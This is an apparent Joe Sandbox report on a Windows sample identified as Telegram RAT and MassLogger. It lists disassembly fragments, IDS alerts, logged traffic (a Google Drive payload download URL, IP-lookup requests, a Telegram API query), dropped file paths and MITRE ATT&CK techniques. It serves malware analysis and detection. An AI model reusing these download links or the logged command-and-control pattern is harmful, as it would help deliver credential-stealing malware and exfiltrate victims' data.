Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECEEA0h	4_2_36ECEBF7
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECE5F0h	4_2_36ECE352
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECB339h	4_2_36ECB07F
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECF2F8h	4_2_36ECF05A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECC499h	4_2_36ECC1F2
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECBBE9h	4_2_36ECB944
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A882Dh	4_2_373A8650
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A91B7h	4_2_373A8650
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then push 00000000h	4_2_373ABDF0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A61B8h	4_2_373A5F10
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A4218h	4_2_373A3F70
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A1250h	4_2_373A0FA8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A6A68h	4_2_373A67C0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A30B8h	4_2_373A2E10
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A5908h	4_2_373A5660
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A3968h	4_2_373A36C0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A2808h	4_2_373A2560
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A5058h	4_2_373A4DB0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A6EC0h	4_2_373A6C18
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A16A8h	4_2_373A1400
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A1F58h	4_2_373A1CB0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A7770h	4_2_373A74C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A3DC0h	4_2_373A3B18
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A6610h	4_2_373A6368
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_373A7B65
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A4670h	4_2_373A43C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A54B0h	4_2_373A5208
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A3510h	4_2_373A3268
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A5D60h	4_2_373A5AB8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A23B0h	4_2_373A2108
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A2C60h	4_2_373A29B8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A4ACAh	4_2_373A4820
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A7318h	4_2_373A7070
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 373A1B00h	4_2_373A1858
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then push 00000000h	4_2_377DE7C8

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49816 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.181.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report grrezORe7h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Institutionalisering.Pla151

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Riprap43.gaw

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\forskansningens.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets\fyldebtten.soi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets\wildwestfilm.sto

C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Benchership141.lnk

Static File Info

General

Windows Analysis Report
grrezORe7h.exe

Function 004032A0 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 401
stringfilecomCOMMON

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00406077 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Function 00405846 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 0040389E Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre